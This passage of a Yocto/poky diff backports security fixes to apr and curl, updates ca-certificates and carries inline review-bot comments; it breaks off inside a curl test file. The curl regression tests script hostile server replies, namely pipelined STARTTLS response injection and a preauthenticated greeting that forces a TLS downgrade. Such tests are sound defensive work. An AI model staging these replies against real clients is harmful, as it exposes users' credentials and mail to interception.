dayoffset[12] = + {0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334}; + ++ if (tm->wMonth < 1 || tm->wMonth > 12) ++ return APR_EBADDATE; ++ + /* Note; the caller is responsible for filling in detailed tm_usec, + * tm_gmtoff and tm_isdst data when applicable. + */ +@@ -228,6 +231,9 @@ + static const int dayoffset[12] = + {306, 337, 0, 31, 61, 92, 122, 153, 184, 214, 245, 275}; + ++ if (xt->tm_mon < 0 || xt->tm_mon >= 12) ++ return APR_EBADDATE; ++ + /* shift new year to 1st March in order to make leap year calc easy */ + + if (xt->tm_mon < 2) diff --git a/poky/meta/recipes-support/apr/apr_1.7.0.bb b/poky/meta/recipes-support/apr/apr_1.7.0.bb index 432fa3255c..92cc61a864 100644 
--- a/poky/meta/recipes-support/apr/apr_1.7.0.bb +++ b/poky/meta/recipes-support/apr/apr_1.7.0.bb @@ -23,6 +23,7 @@ SRC_URI = "${APACHE_MIRROR}/apr/${BPN}-${PV}.tar.bz2 \ file://0007-explicitly-link-libapr-against-phtread-to-make-gold-.patch \ file://libtoolize_check.patch \ file://0001-Add-option-to-disable-timed-dependant-tests.patch \ + file://CVE-2021-35940.patch \ " SRC_URI[md5sum] = "7a14a83d664e87599ea25ff4432e48a7" diff --git a/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb b/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb index 986f0124e2..97b88ec033 100644 --- a/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb +++ b/poky/meta/recipes-support/bmap-tools/bmap-tools_3.5.bb @@ -9,7 +9,7 @@ SECTION = "console/utils" LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/intel/${BPN}" +SRC_URI = "git://github.com/intel/${BPN};branch=master;protocol=https" SRCREV = "db7087b883bf52cbff063ad17a41cc1cbb85104d" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch new file mode 100644 index 0000000000..5c4a32f526 --- /dev/null +++ b/poky/meta/recipes-support/ca-certificates/ca-certificates/0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch 
@@ -0,0 +1,80 @@ +From cb43ec15b700b25f3c4fe44043a1a021aaf5b768 Mon Sep 17 00:00:00 2001 +From: Alexander Kanavin <alex@linutronix.de> +Date: Mon, 18 Oct 2021 12:05:49 +0200 +Subject: [PATCH] Revert "mozilla/certdata2pem.py: print a warning for expired + certificates." + +This avoids a dependency on python3-cryptography, and only checks +for expired certs (which is upstream concern, but not ours). + +Upstream-Status: Inappropriate [oe-core specific] +Signed-off-by: Alexander Kanavin <alex@linutronix.de> +--- + debian/changelog | 1 - + debian/control | 2 +- + mozilla/certdata2pem.py | 11 ----------- + 3 files changed, 1 insertion(+), 13 deletions(-) + +diff --git a/debian/changelog b/debian/changelog +index 531e4d0..4006509 100644 +--- a/debian/changelog ++++ b/debian/changelog +@@ -37,7 +37,6 @@ ca-certificates (20211004) unstable; urgency=low + - "Trustis FPS Root CA" + - "Staat der Nederlanden Root CA - G3" + * Blacklist expired root certificate "DST Root CA X3" (closes: #995432) +- * mozilla/certdata2pem.py: print a warning for expired certificates. + + -- Julien Cristau <jcristau@debian.org> Thu, 07 Oct 2021 17:12:47 +0200 + +diff --git a/debian/control b/debian/control +index 4434b7a..5c6ba24 100644 +--- a/debian/control ++++ b/debian/control +@@ -3,7 +3,7 @@ Section: misc + Priority: optional + Maintainer: Julien Cristau <jcristau@debian.org> + Build-Depends: debhelper-compat (= 13), po-debconf +-Build-Depends-Indep: python3, openssl, python3-cryptography ++Build-Depends-Indep: python3, openssl + Standards-Version: 4.5.0.2 + Vcs-Git: https://salsa.debian.org/debian/ca-certificates.git + Vcs-Browser: https://salsa.debian.org/debian/ca-certificates +diff --git a/mozilla/certdata2pem.py b/mozilla/certdata2pem.py +index ede23d4..7d796f1 100644 +--- a/mozilla/certdata2pem.py ++++ b/mozilla/certdata2pem.py +@@ -21,16 +21,12 @@ + # USA. 
+ + import base64 +-import datetime + import os.path + import re + import sys + import textwrap + import io + +-from cryptography import x509 +- +- + objects = [] + + # Dirty file parser. +@@ -121,13 +117,6 @@ for obj in objects: + if obj['CKA_CLASS'] == 'CKO_CERTIFICATE': + if not obj['CKA_LABEL'] in trust or not trust[obj['CKA_LABEL']]: + continue +- +- cert = x509.load_der_x509_certificate(obj['CKA_VALUE']) +- if cert.not_valid_after < datetime.datetime.now(): +- print('!'*74) +- print('Trusted but expired certificate found: %s' % obj['CKA_LABEL']) +- print('!'*74) +- + bname = obj['CKA_LABEL'][1:-1].replace('/', '_')\ + .replace(' ', '_')\ + .replace('(', '=')\ +-- +2.20.1 + diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch deleted file mode 100644 index f343ebf16e..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates/sbindir.patch +++ /dev/null @@ -1,26 +0,0 @@ -sbin/Makefile: Allow the sbin path to be configurable - -Some project sharing ca-certificates from Debian allow configuration -of the installation location. Make the sbin location configurable. - -Also ensure the target directory exists - -Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> -Upstream-Status: Submitted [https://salsa.debian.org/debian/ca-certificates/-/merge_requests/5] - ---- ca-certificates-20130119.orig/sbin/Makefile -+++ ca-certificates-20130119/sbin/Makefile -@@ -3,9 +3,12 @@ - # - # - -+SBINDIR = /usr/sbin -+ - all: - - clean: - - install: -- install -m755 update-ca-certificates $(DESTDIR)/usr/sbin/ -+ install -d $(DESTDIR)$(SBINDIR) -+ install -m755 update-ca-certificates $(DESTDIR)$(SBINDIR)/ 
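Review bot: Reverting the expiry warning in `mozilla/certdata2pem.py` means a root that is still marked trusted but has passed its expiry date is written into the bundle with no build-time signal. The patch header gives the reason (avoiding `python3-cryptography`), but nothing records that expiry is no longer checked anywhere. A sentence in the header saying so, or a recipe-side check, would help whoever audits the trust store. If the signal is wanted without the extra dependency, `openssl x509 -checkend 0 -noout -in <pem>` over the generated files reports expired certificates using only openssl, which the recipe already lists in `PACKAGE_WRITE_DEPS`.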
diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch b/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch deleted file mode 100644 index f78790923c..0000000000 --- a/poky/meta/recipes-support/ca-certificates/ca-certificates/update-ca-certificates-support-Toybox.patch +++ /dev/null @@ -1,33 +0,0 @@ -update-ca-certificates: Replace deprecated mktemp -t with mktemp --tmpdir - -According to coreutils docs, mktemp -t is deprecated, switch to the ---tmpdir option instead. - -Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> -Upstream-Status: Submitted [https://salsa.debian.org/debian/ca-certificates/-/merge_requests/5] - -[This was originally for compatibility with toybox but toybox now -supports -t] ---- - sbin/update-ca-certificates | 6 +++--- - 1 file changed, 3 insertions(+), 3 deletions(-) - -diff --git a/sbin/update-ca-certificates b/sbin/update-ca-certificates -index 79c41bb..ae9e3f1 100755 ---- a/sbin/update-ca-certificates -+++ b/sbin/update-ca-certificates -@@ -113,9 +113,9 @@ trap cleanup 0 - - # Helper files. (Some of them are not simple arrays because we spawn - # subshells later on.) --TEMPBUNDLE="$(mktemp -t "${CERTBUNDLE}.tmp.XXXXXX")" --ADDED="$(mktemp -t "ca-certificates.tmp.XXXXXX")" --REMOVED="$(mktemp -t "ca-certificates.tmp.XXXXXX")" -+TEMPBUNDLE="$(mktemp --tmpdir "${CERTBUNDLE}.tmp.XXXXXX")" -+ADDED="$(mktemp --tmpdir "ca-certificates.tmp.XXXXXX")" -+REMOVED="$(mktemp --tmpdir "ca-certificates.tmp.XXXXXX")" - - # Adds a certificate to the list of trusted ones. This includes a symlink - # in /etc/ssl/certs to the certificate file and its inclusion into the --- -2.1.4 diff --git a/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb b/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb index 7dcc86fdc1..a54d6b458a 100644 
--- a/poky/meta/recipes-support/ca-certificates/ca-certificates_20210119.bb +++ b/poky/meta/recipes-support/ca-certificates/ca-certificates_20211016.bb @@ -14,15 +14,14 @@ DEPENDS_class-nativesdk = "openssl-native" # Need rehash from openssl and run-parts from debianutils PACKAGE_WRITE_DEPS += "openssl-native debianutils-native" -SRCREV = "181be7ebd169b4a6fb5d90c3e6dc791e90534144" +SRCREV = "07de54fdcc5806bde549e1edf60738c6bccf50e8" -SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https \ +SRC_URI = "git://salsa.debian.org/debian/ca-certificates.git;protocol=https;branch=master \ file://0002-update-ca-certificates-use-SYSROOT.patch \ file://0001-update-ca-certificates-don-t-use-Debianisms-in-run-p.patch \ - file://update-ca-certificates-support-Toybox.patch \ file://default-sysroot.patch \ - file://sbindir.patch \ file://0003-update-ca-certificates-use-relative-symlinks-from-ET.patch \ + file://0001-Revert-mozilla-certdata2pem.py-print-a-warning-for-e.patch \ " UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+)" diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch new file mode 100644 index 0000000000..4afd755149 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22946-pre1.patch 
@@ -0,0 +1,86 @@ +Backport of: + +From 1397a7de6e312e019a3b339f855ba0a5cafa9127 Mon Sep 17 00:00:00 2001 +From: Daniel Stenberg <daniel@haxx.se> +Date: Mon, 21 Sep 2020 09:15:51 +0200 +Subject: [PATCH] ftp: separate FTPS from FTP over "HTTPS proxy" + +When using HTTPS proxy, SSL is used but not in the view of the FTP +protocol handler itself so separate the connection's use of SSL from the +FTP control connection's sue. + +Reported-by: Mingtao Yang +Fixes #5523 +Closes #6006 + +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe <mac@mcrowe.com> +--- + lib/ftp.c | 13 ++++++------- + lib/urldata.h | 1 + + 2 files changed, 7 insertions(+), 7 deletions(-) + +diff --git a/lib/ftp.c b/lib/ftp.c +index 3382772..677527f 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2488,7 +2488,7 @@ static CURLcode ftp_state_loggedin(struct connectdata *conn) + { + CURLcode result = CURLE_OK; + +- if(conn->ssl[FIRSTSOCKET].use) { ++ if(conn->bits.ftp_use_control_ssl) { + /* PBSZ = PROTECTION BUFFER SIZE. + + The 'draft-murray-auth-ftp-ssl' (draft 12, page 7) says: +@@ -2633,11 +2633,8 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + } + #endif + +- if(data->set.use_ssl && +- (!conn->ssl[FIRSTSOCKET].use || +- (conn->bits.proxy_ssl_connected[FIRSTSOCKET] && +- !conn->proxy_ssl[FIRSTSOCKET].use))) { +- /* We don't have a SSL/TLS connection yet, but FTPS is ++ if(data->set.use_ssl && !conn->bits.ftp_use_control_ssl) { ++ /* We don't have a SSL/TLS control connection yet, but FTPS is + requested. 
Try a FTPS connection now */ + + ftpc->count3 = 0; +@@ -2682,6 +2679,7 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + result = Curl_ssl_connect(conn, FIRSTSOCKET); + if(!result) { + conn->bits.ftp_use_data_ssl = FALSE; /* clear-text data */ ++ conn->bits.ftp_use_control_ssl = TRUE; /* SSL on control */ + result = ftp_state_user(conn); + } + } +@@ -3072,7 +3070,7 @@ static CURLcode ftp_block_statemach(struct connectdata *conn) + * + */ + static CURLcode ftp_connect(struct connectdata *conn, +- bool *done) /* see description above */ ++ bool *done) /* see description above */ + { + CURLcode result; + struct ftp_conn *ftpc = &conn->proto.ftpc; +@@ -3093,6 +3091,7 @@ static CURLcode ftp_connect(struct connectdata *conn, + result = Curl_ssl_connect(conn, FIRSTSOCKET); + if(result) + return result; ++ conn->bits.ftp_use_control_ssl = TRUE; + } + + Curl_pp_init(pp); /* init the generic pingpong data */ +diff --git a/lib/urldata.h b/lib/urldata.h +index ff2d686..d1fb4a9 100644 +--- a/lib/urldata.h ++++ b/lib/urldata.h +@@ -461,6 +461,7 @@ struct ConnectBits { + EPRT doesn't work we disable it for the forthcoming + requests */ + BIT(ftp_use_data_ssl); /* Enabled SSL for the data connection */ ++ BIT(ftp_use_control_ssl); /* Enabled SSL for the control connection */ + #endif + BIT(netrc); /* name+password provided by netrc */ + BIT(userpwd_in_url); /* name+password found in url */ diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch new file mode 100644 index 0000000000..98032d8b78 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22946.patch 
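Review bot: The header line `Upstream-Status: backport from 7.68.0-1ubuntu2.7` points at a distribution package rather than the upstream change, which makes the provenance of this security prerequisite harder to verify. The upstream commit id is already in the `From` line, so the tag can carry it in the usual form, `Upstream-Status: Backport [https://github.com/curl/curl/commit/1397a7de6e312e019a3b339f855ba0a5cafa9127]`. CVE-2021-22946.patch uses the same wording, and CVE-2021-3246_1.patch and CVE-2021-3246_2.patch earlier in this commit carry `Upstream-Status: Backport` with no reference at all.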
@@ -0,0 +1,328 @@ +Backport of: + +From 96d71feb27e533a8b337512841a537952916262c Mon Sep 17 00:00:00 2001 +From: Patrick Monnerat <patrick@monnerat.net> +Date: Wed, 8 Sep 2021 11:56:22 +0200 +Subject: [PATCH] ftp,imap,pop3: do not ignore --ssl-reqd + +In imap and pop3, check if TLS is required even when capabilities +request has failed. + +In ftp, ignore preauthentication (230 status of server greeting) if TLS +is required. + +Bug: https://curl.se/docs/CVE-2021-22946.html +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe <mac@mcrowe.com> +CVE: CVE-2021-22946 +--- + lib/ftp.c | 9 ++++--- + lib/imap.c | 24 ++++++++---------- + lib/pop3.c | 33 +++++++++++------------- + tests/data/Makefile.inc | 2 ++ + tests/data/test984 | 56 +++++++++++++++++++++++++++++++++++++++++ + tests/data/test985 | 54 +++++++++++++++++++++++++++++++++++++++ + tests/data/test986 | 53 ++++++++++++++++++++++++++++++++++++++ + 7 files changed, 195 insertions(+), 36 deletions(-) + create mode 100644 tests/data/test984 + create mode 100644 tests/data/test985 + create mode 100644 tests/data/test986 + +diff --git a/lib/ftp.c b/lib/ftp.c +index 677527f..91b43d8 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2606,9 +2606,12 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + /* we have now received a full FTP server response */ + switch(ftpc->state) { + case FTP_WAIT220: +- if(ftpcode == 230) +- /* 230 User logged in - already! */ +- return ftp_state_user_resp(conn, ftpcode, ftpc->state); ++ if(ftpcode == 230) { ++ /* 230 User logged in - already! Take as 220 if TLS required. 
*/ ++ if(data->set.use_ssl <= CURLUSESSL_TRY || ++ conn->bits.ftp_use_control_ssl) ++ return ftp_state_user_resp(conn, ftpcode, ftpc->state); ++ } + else if(ftpcode != 220) { + failf(data, "Got a %03d ftp-server response when 220 was expected", + ftpcode); +diff --git a/lib/imap.c b/lib/imap.c +index 66172bd..9880ce1 100644 +--- a/lib/imap.c ++++ b/lib/imap.c +@@ -917,22 +917,18 @@ static CURLcode imap_state_capability_resp(struct connectdata *conn, + line += wordlen; + } + } +- else if(imapcode == IMAP_RESP_OK) { +- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { +- /* We don't have a SSL/TLS connection yet, but SSL is requested */ +- if(imapc->tls_supported) +- /* Switch to TLS connection now */ +- result = imap_perform_starttls(conn); +- else if(data->set.use_ssl == CURLUSESSL_TRY) +- /* Fallback and carry on with authentication */ +- result = imap_perform_authentication(conn); +- else { +- failf(data, "STARTTLS not supported."); +- result = CURLE_USE_SSL_FAILED; +- } ++ else if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { ++ /* PREAUTH is not compatible with STARTTLS. 
*/ ++ if(imapcode == IMAP_RESP_OK && imapc->tls_supported && !imapc->preauth) { ++ /* Switch to TLS connection now */ ++ result = imap_perform_starttls(conn); + } +- else ++ else if(data->set.use_ssl <= CURLUSESSL_TRY) + result = imap_perform_authentication(conn); ++ else { ++ failf(data, "STARTTLS not available."); ++ result = CURLE_USE_SSL_FAILED; ++ } + } + else + result = imap_perform_authentication(conn); +diff --git a/lib/pop3.c b/lib/pop3.c +index 57c1373..145b2b4 100644 +--- a/lib/pop3.c ++++ b/lib/pop3.c +@@ -721,28 +721,23 @@ static CURLcode pop3_state_capa_resp(struct connectdata *conn, int pop3code, + } + } + } +- else if(pop3code == '+') { +- if(data->set.use_ssl && !conn->ssl[FIRSTSOCKET].use) { +- /* We don't have a SSL/TLS connection yet, but SSL is requested */ +- if(pop3c->tls_supported) +- /* Switch to TLS connection now */ +- result = pop3_perform_starttls(conn); +- else if(data->set.use_ssl == CURLUSESSL_TRY) +- /* Fallback and carry on with authentication */ +- result = pop3_perform_authentication(conn); +- else { +- failf(data, "STLS not supported."); +- result = CURLE_USE_SSL_FAILED; +- } +- } +- else +- result = pop3_perform_authentication(conn); +- } + else { + /* Clear text is supported when CAPA isn't recognised */ +- pop3c->authtypes |= POP3_TYPE_CLEARTEXT; ++ if(pop3code != '+') ++ pop3c->authtypes |= POP3_TYPE_CLEARTEXT; + +- result = pop3_perform_authentication(conn); ++ if(!data->set.use_ssl || conn->ssl[FIRSTSOCKET].use) ++ result = pop3_perform_authentication(conn); ++ else if(pop3code == '+' && pop3c->tls_supported) ++ /* Switch to TLS connection now */ ++ result = pop3_perform_starttls(conn); ++ else if(data->set.use_ssl <= CURLUSESSL_TRY) ++ /* Fallback and carry on with authentication */ ++ result = pop3_perform_authentication(conn); ++ else { ++ failf(data, "STLS not supported."); ++ result = CURLE_USE_SSL_FAILED; ++ } + } + + return result; +diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc +index 
f9535a6..0fa6799 100644 +--- a/tests/data/Makefile.inc ++++ b/tests/data/Makefile.inc +@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \ + test954 test955 test956 test957 test958 test959 test960 test961 test962 \ + test963 test964 test965 test966 test967 test968 test969 \ + \ ++test984 test985 test986 \ ++\ + test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \ + test1008 test1009 test1010 test1011 test1012 test1013 test1014 test1015 \ + test1016 test1017 test1018 test1019 test1020 test1021 test1022 test1023 \ +diff --git a/tests/data/test984 b/tests/data/test984 +new file mode 100644 +index 0000000..e573f23 +--- /dev/null ++++ b/tests/data/test984 +@@ -0,0 +1,56 @@ ++<testcase> ++<info> ++<keywords> ++IMAP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY CAPABILITY A001 BAD Not implemented ++</servercmd> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++imap ++</server> ++ <name> ++IMAP require STARTTLS with failing capabilities ++ </name> ++ <command> ++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl-reqd ++</command> ++<file name="log/upload%TESTNUMBER"> ++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST) ++From: Fred Foobar <foobar@example.COM> ++Subject: afternoon meeting ++To: joe@example.com ++Message-Id: <B27397-0100000@example.COM> ++MIME-Version: 1.0 ++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII ++ ++Hello Joe, do you think we can meet at 3:30 tomorrow? 
++</file> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 64 is CURLE_USE_SSL_FAILED ++<errorcode> ++64 ++</errorcode> ++<protocol> ++A001 CAPABILITY ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test985 b/tests/data/test985 +new file mode 100644 +index 0000000..d0db4aa +--- /dev/null ++++ b/tests/data/test985 +@@ -0,0 +1,54 @@ ++<testcase> ++<info> ++<keywords> ++POP3 ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY CAPA -ERR Not implemented ++</servercmd> ++<data nocheck="yes"> ++From: me@somewhere ++To: fake@nowhere ++ ++body ++ ++-- ++ yours sincerely ++</data> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++pop3 ++</server> ++ <name> ++POP3 require STARTTLS with failing capabilities ++ </name> ++ <command> ++pop3://%HOSTIP:%POP3PORT/%TESTNUMBER -u user:secret --ssl-reqd ++ </command> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 64 is CURLE_USE_SSL_FAILED ++<errorcode> ++64 ++</errorcode> ++<protocol> ++CAPA ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test986 b/tests/data/test986 +new file mode 100644 +index 0000000..a709437 +--- /dev/null ++++ b/tests/data/test986 +@@ -0,0 +1,53 @@ ++<testcase> ++<info> ++<keywords> ++FTP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++REPLY welcome 230 Welcome ++REPLY AUTH 500 unknown command ++</servercmd> ++</reply> ++ ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++ftp ++</server> ++ <name> ++FTP require STARTTLS while preauthenticated ++ </name> ++<file name="log/test%TESTNUMBER.txt"> ++data ++ to ++ see ++that FTPS ++works ++ so does it? 
++</file> ++ <command> ++--ssl-reqd --ftp-ssl-control ftp://%HOSTIP:%FTPPORT/%TESTNUMBER -T log/test%TESTNUMBER.txt -u user:secret ++</command> ++</client> ++ ++# Verify data after the test has been "shot" ++<verify> ++# 64 is CURLE_USE_SSL_FAILED ++<errorcode> ++64 ++</errorcode> ++<protocol> ++AUTH SSL ++AUTH TLS ++</protocol> ++</verify> ++</testcase> diff --git a/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch b/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch new file mode 100644 index 0000000000..070a328e27 --- /dev/null +++ b/poky/meta/recipes-support/curl/curl/CVE-2021-22947.patch 
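Review bot: The clear-text fallback tests added in lib/ftp.c, lib/imap.c and lib/pop3.c use `data->set.use_ssl <= CURLUSESSL_TRY`, an ordered comparison that is only safe if every level at or below CURLUSESSL_TRY permits clear text. The enum definition is not part of this patch, so that ordering is assumed here. In the imap and pop3 branches the enclosing test already requires `data->set.use_ssl` to be non-zero, so `== CURLUSESSL_TRY` would state the same condition more plainly. In the FTP_WAIT220 hunk I would add `/* use_ssl levels are ordered; anything at or below TRY permits clear text */` above the test, so that a later change to the enum cannot silently re-open the downgrade this patch closes.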
@@ -0,0 +1,352 @@ +Backport of: + +From 259b4f2e1fd01fbc55e569ee0a507afeae34f77c Mon Sep 17 00:00:00 2001 +From: Patrick Monnerat <patrick@monnerat.net> +Date: Tue, 7 Sep 2021 13:26:42 +0200 +Subject: [PATCH] ftp,imap,pop3,smtp: reject STARTTLS server response + pipelining + +If a server pipelines future responses within the STARTTLS response, the +former are preserved in the pingpong cache across TLS negotiation and +used as responses to the encrypted commands. + +This fix detects pipelined STARTTLS responses and rejects them with an +error. + +Bug: https://curl.se/docs/CVE-2021-22947.html +Upstream-Status: backport from 7.68.0-1ubuntu2.7 +Signed-off-by: Mike Crowe <mac@mcrowe.com> +CVE: CVE-2021-22947 + +--- + lib/ftp.c | 3 +++ + lib/imap.c | 4 +++ + lib/pop3.c | 4 +++ + lib/smtp.c | 4 +++ + tests/data/Makefile.inc | 2 ++ + tests/data/test980 | 52 ++++++++++++++++++++++++++++++++++++ + tests/data/test981 | 59 +++++++++++++++++++++++++++++++++++++++++ + tests/data/test982 | 57 +++++++++++++++++++++++++++++++++++++++ + tests/data/test983 | 52 ++++++++++++++++++++++++++++++++++++ + 9 files changed, 237 insertions(+) + create mode 100644 tests/data/test980 + create mode 100644 tests/data/test981 + create mode 100644 tests/data/test982 + create mode 100644 tests/data/test983 + +diff --git a/lib/ftp.c b/lib/ftp.c +index 91b43d8..31a34e8 100644 +--- a/lib/ftp.c ++++ b/lib/ftp.c +@@ -2670,6 +2670,9 @@ static CURLcode ftp_statemach_act(struct connectdata *conn) + case FTP_AUTH: + /* we have gotten the response to a previous AUTH command */ + ++ if(pp->cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; /* Forbid pipelining in response. 
*/ ++ + /* RFC2228 (page 5) says: + * + * If the server is willing to accept the named security mechanism, +diff --git a/lib/imap.c b/lib/imap.c +index 9880ce1..0ca700f 100644 +--- a/lib/imap.c ++++ b/lib/imap.c +@@ -946,6 +946,10 @@ static CURLcode imap_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.imapc.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(imapcode != IMAP_RESP_OK) { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied"); +diff --git a/lib/pop3.c b/lib/pop3.c +index 145b2b4..8a2d52e 100644 +--- a/lib/pop3.c ++++ b/lib/pop3.c +@@ -753,6 +753,10 @@ static CURLcode pop3_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. */ ++ if(data->conn->proto.pop3c.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(pop3code != '+') { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied"); +diff --git a/lib/smtp.c b/lib/smtp.c +index e187287..66183e2 100644 +--- a/lib/smtp.c ++++ b/lib/smtp.c +@@ -820,6 +820,10 @@ static CURLcode smtp_state_starttls_resp(struct connectdata *conn, + + (void)instate; /* no use for this yet */ + ++ /* Pipelining in response is forbidden. 
*/ ++ if(data->conn->proto.smtpc.pp.cache_size) ++ return CURLE_WEIRD_SERVER_REPLY; ++ + if(smtpcode != 220) { + if(data->set.use_ssl != CURLUSESSL_TRY) { + failf(data, "STARTTLS denied, code %d", smtpcode); +diff --git a/tests/data/Makefile.inc b/tests/data/Makefile.inc +index 0fa6799..60e8176 100644 +--- a/tests/data/Makefile.inc ++++ b/tests/data/Makefile.inc +@@ -112,6 +112,8 @@ test945 test946 test947 test948 test949 test950 test951 test952 test953 \ + test954 test955 test956 test957 test958 test959 test960 test961 test962 \ + test963 test964 test965 test966 test967 test968 test969 \ + \ ++test980 test981 test982 test983 \ ++\ + test984 test985 test986 \ + \ + test1000 test1001 test1002 test1003 test1004 test1005 test1006 test1007 \ +diff --git a/tests/data/test980 b/tests/data/test980 +new file mode 100644 +index 0000000..97567f8 +--- /dev/null ++++ b/tests/data/test980 +@@ -0,0 +1,52 @@ ++<testcase> ++<info> ++<keywords> ++SMTP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++CAPA STARTTLS ++AUTH PLAIN ++REPLY STARTTLS 454 currently unavailable\r\n235 Authenticated\r\n250 2.1.0 Sender ok\r\n250 2.1.5 Recipient ok\r\n354 Enter mail\r\n250 2.0.0 Accepted ++REPLY AUTH 535 5.7.8 Authentication credentials invalid ++</servercmd> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++smtp ++</server> ++ <name> ++SMTP STARTTLS pipelined server response ++ </name> ++<stdin> ++mail body ++</stdin> ++ <command> ++smtp://%HOSTIP:%SMTPPORT/%TESTNUMBER --mail-rcpt recipient@example.com --mail-from sender@example.com -u user:secret --ssl --sasl-ir -T - ++</command> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++EHLO %TESTNUMBER ++STARTTLS ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test981 b/tests/data/test981 +new file mode 100644 +index 0000000..2b98ce4 +--- /dev/null 
++++ b/tests/data/test981 +@@ -0,0 +1,59 @@ ++<testcase> ++<info> ++<keywords> ++IMAP ++STARTTLS ++</keywords> ++</info> ++ ++# ++# Server-side ++<reply> ++<servercmd> ++CAPA STARTTLS ++REPLY STARTTLS A002 BAD currently unavailable\r\nA003 OK Authenticated\r\nA004 OK Accepted ++REPLY LOGIN A003 BAD Authentication credentials invalid ++</servercmd> ++</reply> ++ ++# ++# Client-side ++<client> ++<features> ++SSL ++</features> ++<server> ++imap ++</server> ++ <name> ++IMAP STARTTLS pipelined server response ++ </name> ++ <command> ++imap://%HOSTIP:%IMAPPORT/%TESTNUMBER -T log/upload%TESTNUMBER -u user:secret --ssl ++</command> ++<file name="log/upload%TESTNUMBER"> ++Date: Mon, 7 Feb 1994 21:52:25 -0800 (PST) ++From: Fred Foobar <foobar@example.COM> ++Subject: afternoon meeting ++To: joe@example.com ++Message-Id: <B27397-0100000@example.COM> ++MIME-Version: 1.0 ++Content-Type: TEXT/PLAIN; CHARSET=US-ASCII ++ ++Hello Joe, do you think we can meet at 3:30 tomorrow? ++</file> ++</client> ++ ++# ++# Verify data after the test has been "shot" ++<verify> ++# 8 is CURLE_WEIRD_SERVER_REPLY ++<errorcode> ++8 ++</errorcode> ++<protocol> ++A001 CAPABILITY ++A002 STARTTLS ++</protocol> ++</verify> ++</testcase> +diff --git a/tests/data/test982 b/tests/data/test982 +new file mode 100644 +index 0000000..9e07cc0 +--- /dev/null ++++ 